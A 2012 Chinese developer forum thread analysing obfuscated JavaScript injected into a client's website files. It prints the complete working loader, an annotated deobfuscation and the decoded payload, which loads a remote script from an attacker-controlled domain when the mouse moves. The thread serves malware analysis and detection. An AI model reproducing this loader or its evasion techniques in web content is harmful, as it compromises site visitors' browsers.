JavaScript 能让 evernote 客户端崩溃的 javascript 代码

匿名 · 2012年06月21日 · 最后由 tylerlong 回复于 2012年06月22日 · 3912 次阅读

今天帮一位国外的客户诊断网站木马问题,发现他的网站上有几个 js 文件的末尾被加入了如下的一行。结果通过浏览器访问的时候,我的电脑上的杀毒软件 (Microsoft Security Essentials) 会弹出窗口报发现木马。我把那一行代码从 js 文件移除之后,客户的问题就解决了。

可是后来我自己又发现了怪异的问题:打算把代码保存到 evernote 中,等有时间再研究。用的是电脑客户端版的 evernote, 新建了一篇 note, 结果刚粘贴进去那一行代码,evernote 就崩溃了!我想这 js 代码对 evernote 来讲不就是纯文本吗?难道 evernote 客户端还解析代码?于是认为是巧合。便把代码贴到编辑器中格式化了一下,evernote 弄好后,新建 note, 再次粘贴,没事。就在我按 ctrl + s 保存的那一瞬间,evernote 又崩溃了!这个现象真的不好解释了。黑客就是牛,写了 js 木马,把不能解释 js 的程序都搞崩溃了。

贴代码如下,各位自担风险:

// Analyst notes (defensive): this is the single line that was appended to the site's .js files.
// It never names eval or fromCharCode in plaintext: both are assembled from fragments, the
// numeric "$"-separated blob is turned into characters with 2*(3+value) (h is -2), and the
// result is passed to eval. Two deliberately failing try blocks (appendChild of a string,
// reference to the undeclared identifier `prototype`) are used only to reach their catch
// branches. A formatted and annotated copy follows further down the page.
try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'om'+'Ch';f+='arC';}try{qwe=prototype;}catch(brebr){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f.substr(11)+zz];n="17$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$56$45.5$54$13$55.5$54$51$13$27.5$13$16.5$49$55$55$53$26$20.5$20.5$51.5$55$49$56$54$53$47$57.5$57.5$49.5$20$47$52.5$47.5$54.5$52$55$47.5$57$49.5$54.5$55$20$46.5$52.5$51.5$20.5$48.5$20.5$16.5$26.5$3.5$2$1.5$49.5$48$13$17$55$57.5$53$47.5$52.5$48$13$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$27.5$27.5$13$16.5$55.5$52$47$47.5$48$49.5$52$47.5$47$16.5$17.5$13$58.5$3.5$2$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$21$26.5$3.5$2$1.5$59.5$3.5$2$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$52.5$52$51.5$52.5$55.5$54.5$47.5$51.5$52.5$56$47.5$13$27.5$13$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$1.5$49.5$48$13$17$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$27.5$27.5$13$21$17.5$13$58.5$3.5$2$1.5$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$21.5$26.5$3.5$2$1.5$1.5$1.5$56$45.5$54$13$49$47.5$45.5$47$13$27.5$13$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$49$47.5$45.5$47$16.5$17.5$42.5$21$43.5$26.5$3.5$2$1.5$1.5$1.5$56$45.5$54$13$54.5$46.5$54$49.5$53$55$13$27.5$13$47$52.5$46.5$55.5$51.5$47.5$52$55$20$46.5$54$47.5$45.5$55$47.5$31.5$51$47.5$51.5$47.5$52$55$17$16.5$54.5$46.5$54$49.5$53$55$16.5$17.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$55$57.5$53$47.5$13$27.5$13$16.5$55$47.5$57$55$20.5$50$45.5$56$45.5$54.5$46.5$54$49.5$53$55$16.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$52.5$52$54$47.5$45.5$47$57.5$54.5$55$45.5$55$47.5$46.5$49$45.5$52$48.5$47.5$13$27.5$13$48$55.5$52$46.5$55$49.5$52.5$52$13$17$17.5$13$58.5$3.5$2$1.5$1.5$1.5$1.5$49.5$48$13$17$55$49$49.5$54.5$20$54$47.5$45.5$47$57.5$38.5$55$45.5
$55$47.5$13$27.5$27.5$13$16.5$46.5$52.5$51.5$53$51$47.5$55$47.5$16.5$17.5$13$58.5$3.5$2$1.5$1.5$1.5$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$22$26.5$3.5$2$1.5$1.5$1.5$1.5$59.5$3.5$2$1.5$1.5$1.5$59.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$52.5$52$51$52.5$45.5$47$13$27.5$13$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$1.5$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$22$26.5$3.5$2$1.5$1.5$1.5$59.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$54.5$54$46.5$13$27.5$13$55.5$54$51$13$18.5$13$35.5$45.5$55$49$20$54$45.5$52$47$52.5$51.5$17$17.5$20$55$52.5$38.5$55$54$49.5$52$48.5$17$17.5$20$54.5$55.5$46$54.5$55$54$49.5$52$48.5$17$22.5$17.5$13$18.5$13$16.5$20$50$54.5$16.5$26.5$3.5$2$1.5$1.5$1.5$49$47.5$45.5$47$20$45.5$53$53$47.5$52$47$30.5$49$49.5$51$47$17$54.5$46.5$54$49.5$53$55$17.5$26.5$3.5$2$1.5$1.5$59.5$3.5$2$1.5$59.5$26.5$3.5$2$59.5$17.5$17$17.5$26.5"[((e)?"s":"")+"p"+"lit"]("a$".substr(1));for(i=6-2-1-2-1;i-687!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(3+1*n[k]));}q=ss;e(q);}

格式化之后的版本:

// Analyst notes (defensive): formatted copy of the injected loader. Nothing here is a
// plaintext call to eval() or String.fromCharCode(); the names are glued together from
// fragments and looked up on the global object, and the payload is a "$"-separated list
// of numbers decoded as 2*(3+value). Each step is annotated with the value it produces.
try{
    q=document.createElement("u");
    // appendChild() with a string argument is a TypeError in browsers: the try exists only
    // to land in the catch below, the thrown value (qw) is never used.
    q.appendChild(q+"");
}catch(qw){
    h=-012/5;            // legacy octal literal: 012 === 10, so h === -2
    zz='a'+'l';          // "al"
    f='fr'+'om'+'Ch';    // "fromCh"
    f+='arC';            // "fromCharC"
}

try{
    qwe=prototype;       // `prototype` is an undeclared identifier -> ReferenceError -> catch runs
}catch(brebr){
    zz='zv'.substr(123-122)+zz;   // "v" + "al" === "val"
    ss=[];                        // becomes a string at the first `ss + ...` below
    f+=(h)?'ode':"";              // h is -2 (truthy): "fromCharCode"
    w=this;                       // the global object when this runs at top level
    e=w[f.substr(11)+zz];         // "fromCharCode".substr(11) === "e"; "e"+"val" -> global eval

    // The bracket lookup after the string literal is ["s"+"p"+"lit"] === split, and the
    // argument "a$".substr(1) is "$": n is the list of numbers between the "$" separators.
    n="17$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$56$45.5$54$13$55.5$54$51$13$27.5$13$16.5$49$55$55$53$26$20.5$20.5$51.5$55$49$56$54$53$47$57.5$57.5$49.5$20$47$52.5$47.5$54.5$52$55$47.5$57$49.5$54.5$55$20$46.5$52.5$51.5$20.5$48.5$20.5$16.5$26.5$3.5$2$1.5$49.5$48$13$17$55$57.5$53$47.5$52.5$48$13$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$27.5$27.5$13$16.5$55.5$52$47$47.5$48$49.5$52$47.5$47$16.5$17.5$13$58.5$3.5$2$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$21$26.5$3.5$2$1.5$59.5$3.5$2$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$52.5$52$51.5$52.5$55.5$54.5$47.5$51.5$52.5$56$47.5$13$27.5$13$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$1.5$49.5$48$13$17$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$27.5$27.5$13$21$17.5$13$58.5$3.5$2$1.5$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$21.5$26.5$3.5$2$1.5$1.5$1.5$56$45.5$54$13$49$47.5$45.5$47$13$27.5$13$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$49$47.5$45.5$47$16.5$17.5$42.5$21$43.5$26.5$3.5$2$1.5$1.5$1.5$56$45.5$54$13$54.5$46.5$54$49.5$53$55$13$27.5$13$47$52.5$46.5$55.5$51.5$47.5$52$55$20$46.5$54$47.5$45.5$55$47.5$31.5$51$47.5$51.5$47.5$52$55$17$16.5$54.5$46.5$54$49.5$53$55$16.5$17.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$55$57.5$53$47.5$13$27.5$13$16.5$55$47.5$57$55$20.5$50$45.5$56$45.5$54.5$46.5$54$49.5$53$55$16.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$52.5$52$54$47.5$45.5$47$57.5$54.5$55$45.5$55$47.5$46.5$49$45.5$52$48.5$47.5$13$27.5$13$48$55.5$52$46.5$55$49.5$52.5$52$13$17$17.5$13$58.5$3.5$2$1.5$1.5$1.5$1.5$49.5$48$13$17$55$49$49.5$54.5$20$54$47.5$45.5$47$57.5$38.5$55$45.5$55$47.5$13$27.5$27.5$13$16.5$46.5$52.5$51.5$53$51$47.5$55$47.5$16.5$17.5$13$58.5$3.5$2$1.5$1.5$1.5$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$22$26.5$3.5$2$1.5$1.5$1.5$1.5$59.5$3.5$2$1
.5$1.5$1.5$59.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$52.5$52$51$52.5$45.5$47$13$27.5$13$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$1.5$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$22$26.5$3.5$2$1.5$1.5$1.5$59.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$54.5$54$46.5$13$27.5$13$55.5$54$51$13$18.5$13$35.5$45.5$55$49$20$54$45.5$52$47$52.5$51.5$17$17.5$20$55$52.5$38.5$55$54$49.5$52$48.5$17$17.5$20$54.5$55.5$46$54.5$55$54$49.5$52$48.5$17$22.5$17.5$13$18.5$13$16.5$20$50$54.5$16.5$26.5$3.5$2$1.5$1.5$1.5$49$47.5$45.5$47$20$45.5$53$53$47.5$52$47$30.5$49$49.5$51$47$17$54.5$46.5$54$49.5$53$55$17.5$26.5$3.5$2$1.5$1.5$59.5$3.5$2$1.5$59.5$26.5$3.5$2$59.5$17.5$17$17.5$26.5"[((e)?"s":"")+"p"+"lit"]("a$".substr(1));

    // i starts at 0 (6-2-1-2-1) and the loop runs until i === 687, one number per iteration.
    for(i=6-2-1-2-1;i-687!=0;i++){
        k=i;
        // -1*h === 2, so each character is 2*(3+n[k]); e.g. "17" -> 40 -> "(".
        // The first decoded characters spell "(function() {".
        ss=ss+String.fromCharCode(-1*h*(3+1*n[k]));
    }
    q=ss;
    e(q);   // eval of the decoded text; the decoded IIFE is quoted further down this thread
}
匿名 #1 2012年06月21日

初步诊断是我的杀毒软件 (Microsoft Security Essentials) 搞的鬼。它只要检测到那段代码,就把相应的文件删掉。evernote 的数据文件被删除了,当然就崩溃了。

这里用 Linux 和 Mac 的人不少,估计用 Mac 的人可能对杀毒软件都不太熟悉了。

就是給你插入一個 script 標簽,然後引用一個外部的 js 文件,好像也沒什麽特別的。。。

// Analyst notes (defensive): this is the decoded payload. On the first mouse movement it
// appends a <script> element pointing at a remote host to <head>. Indicators worth keeping
// for detection: the hardcoded domain below, the `window.xyzflag` marker it leaves on the
// page, and a script URL consisting of a random digit string followed by ".js".
(function() {
    var url = 'http://mthvrpdyyi.doesntexist.com/g/';   // host the second stage is fetched from
    // xyzflag is a once-only guard: 0 = not started, 1 = script element inserted, 2 = loaded
    if (typeof window.xyzflag === 'undefined') {
        window.xyzflag = 0;
    }
    // Plain assignment (not addEventListener) replaces any existing onmousemove handler.
    // Waiting for a real mouse event rather than running on load presumably avoids
    // automated scanners that never move the mouse — an inference, not visible here.
    document.onmousemove = function() {
        if (window.xyzflag === 0) {
            window.xyzflag = 1;
            var head = document.getElementsByTagName('head')[0];
            var script = document.createElement('script');
            script.type = 'text/javascript';
            // onreadystatechange is the legacy IE load notification; onload covers other browsers
            script.onreadystatechange = function() {
                if (this.readyState == 'complete') {
                    window.xyzflag = 2;
                }
            };
            script.onload = function() {
                window.xyzflag = 2;
            };
            // The file name is the digits of Math.random() after "0.", so the URL differs on
            // every page load — presumably to defeat caching and exact-URL blocklists.
            script.src = url + Math.random().toString().substring(3) + '.js';
            head.appendChild(script);
        }
    };
})();

匿名 #4 2012年06月22日

楼上给出的代码是最终要执行的 js 代码。我简单分析了下,把代码执行的过程贴了出来,伪代码,仅供参考:

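// Step-by-step trace of the loader with every obfuscated expression resolved.
// Pseudocode, not meant to be run: `document` is a browser global, and the last
// line hands the decoded text to eval exactly as the original does.
q = document.createElement("u");   // q.appendChild(q+"") then throws, so the first catch runs
h = -2;                            // -012/5, 012 being a legacy octal literal (=== 10)
zz = "al";
f = "fromCharC";

zz = "val";                        // 'zv'.substr(1) + "al"
ss = [];                           // turns into a string at the first `ss + ...`
f = "fromCharCode";
e = eval;                          // this["e" + "val"], looked up on the global object

s = "17$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$56$45.5$54$13$55.5$54$51$13$27.5$13$16.5$49$55$55$53$26$20.5$20.5$51.5$55$49$56$54$53$47$57.5$57.5$49.5$20$47$52.5$47.5$54.5$52$55$47.5$57$49.5$54.5$55$20$46.5$52.5$51.5$20.5$48.5$20.5$16.5$26.5$3.5$2$1.5$49.5$48$13$17$55$57.5$53$47.5$52.5$48$13$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$27.5$27.5$13$16.5$55.5$52$47$47.5$48$49.5$52$47.5$47$16.5$17.5$13$58.5$3.5$2$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$21$26.5$3.5$2$1.5$59.5$3.5$2$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$52.5$52$51.5$52.5$55.5$54.5$47.5$51.5$52.5$56$47.5$13$27.5$13$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$1.5$49.5$48$13$17$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$27.5$27.5$13$21$17.5$13$58.5$3.5$2$1.5$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$21.5$26.5$3.5$2$1.5$1.5$1.5$56$45.5$54$13$49$47.5$45.5$47$13$27.5$13$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$49$47.5$45.5$47$16.5$17.5$42.5$21$43.5$26.5$3.5$2$1.5$1.5$1.5$56$45.5$54$13$54.5$46.5$54$49.5$53$55$13$27.5$13$47$52.5$46.5$55.5$51.5$47.5$52$55$20$46.5$54$47.5$45.5$55$47.5$31.5$51$47.5$51.5$47.5$52$55$17$16.5$54.5$46.5$54$49.5$53$55$16.5$17.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$55$57.5$53$47.5$13$27.5$13$16.5$55$47.5$57$55$20.5$50$45.5$56$45.5$54.5$46.5$54$49.5$53$55$16.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$52.5$52$54$47.5$45.5$47$57.5$54.5$55$45.5$55$47.5$46.5$49$45.5$52$48.5$47.5$13$27.5$13$48$55.5$52$46.5$55$49.5$52.5$52$13$17$17.5$13$58.5$3.5$2$1.5$1.5$1.5$1.5$49.5$48$13$17$55$49$49.5$54.5$20$54$47.5$45.5$47$57.5$38.5$55$45.5$55$47.5$13$27.5$27.5$13$16.5$46.5$52.5$51.5$53$51$47.5$55$47.5$16.5$17.5$13$58.5$3.5$2$1.5$1.5$1.5$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$22$26.5$3.5$2$1.5$1.5$1.5$1.5$59.5$3.5$2$1.5
$1.5$1.5$59.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$52.5$52$51$52.5$45.5$47$13$27.5$13$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$1.5$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$22$26.5$3.5$2$1.5$1.5$1.5$59.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$54.5$54$46.5$13$27.5$13$55.5$54$51$13$18.5$13$35.5$45.5$55$49$20$54$45.5$52$47$52.5$51.5$17$17.5$20$55$52.5$38.5$55$54$49.5$52$48.5$17$17.5$20$54.5$55.5$46$54.5$55$54$49.5$52$48.5$17$22.5$17.5$13$18.5$13$16.5$20$50$54.5$16.5$26.5$3.5$2$1.5$1.5$1.5$49$47.5$45.5$47$20$45.5$53$53$47.5$52$47$30.5$49$49.5$51$47$17$54.5$46.5$54$49.5$53$55$17.5$26.5$3.5$2$1.5$1.5$59.5$3.5$2$1.5$59.5$26.5$3.5$2$59.5$17.5$17$17.5$26.5";

n = s.split("$"); // the ["s"+"p"+"lit"] property lookup is just split; yields 687 numbers as strings

// Decoder: -1*h === 2, so each code point is 2*(3+n[i]) — the value from the list, not
// the loop index. E.g. "17" -> 40 -> "(", and the first characters spell "(function() {".
for (i = 0; i < 687; i++) { // iterate those 687 numbers
    charCode = (3 + Number(n[i])) * 2;
    ss = ss + String.fromCharCode(charCode);
}

eval(ss); // ss is the IIFE quoted just below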

最终被 eval 执行的代码 ss 也就是楼上贴出来的那段:

// Analyst notes (defensive): the text that the decoder above produces and passes to eval.
// It inserts a remote <script> into <head> on the first mouse movement and marks the page
// with `window.xyzflag` so it only does so once. The domain, the xyzflag property and the
// random-digits ".js" file name are the observable indicators.
(function() {
    var url = 'http://mthvrpdyyi.doesntexist.com/g/';   // host of the second stage
    // xyzflag: 0 = not started, 1 = script element inserted, 2 = loaded
    if (typeof window.xyzflag === 'undefined') {
        window.xyzflag = 0;
    }
    // Assigned directly, so it overrides any onmousemove handler the page already had.
    document.onmousemove = function() {
        if (window.xyzflag === 0) {
            window.xyzflag = 1;
            var head = document.getElementsByTagName('head')[0];
            var script = document.createElement('script');
            script.type = 'text/javascript';
            // legacy IE completion event; onload below covers other browsers
            script.onreadystatechange = function () {
                if (this.readyState == 'complete') {
                    window.xyzflag = 2;
                }
            };
            script.onload = function() {
                window.xyzflag = 2;
            };
            // digits of Math.random() after "0." -> a different file name on every load
            script.src = url + Math.random().toString().substring(3) + '.js';
            head.appendChild(script);
        }
    };
})();
匿名 #5 2012年06月22日

#2 楼 @lgn21st 像这种通过服务器端注入 js 脚本,通过浏览器执行的木马,我想 linux 和 mac 也无法免疫。只不过没有杀毒软件,没有报警而已。

匿名 #6 2012年06月22日

最终被插入页面的脚本地址格式:http://mthvrpdyyi.doesntexist.com/g/703457125462592.js, 其中数字是随机生成的:Math.random().toString().substring(3)

不过打开脚本链接发现内容为空。暂时不知道它想要做什么。
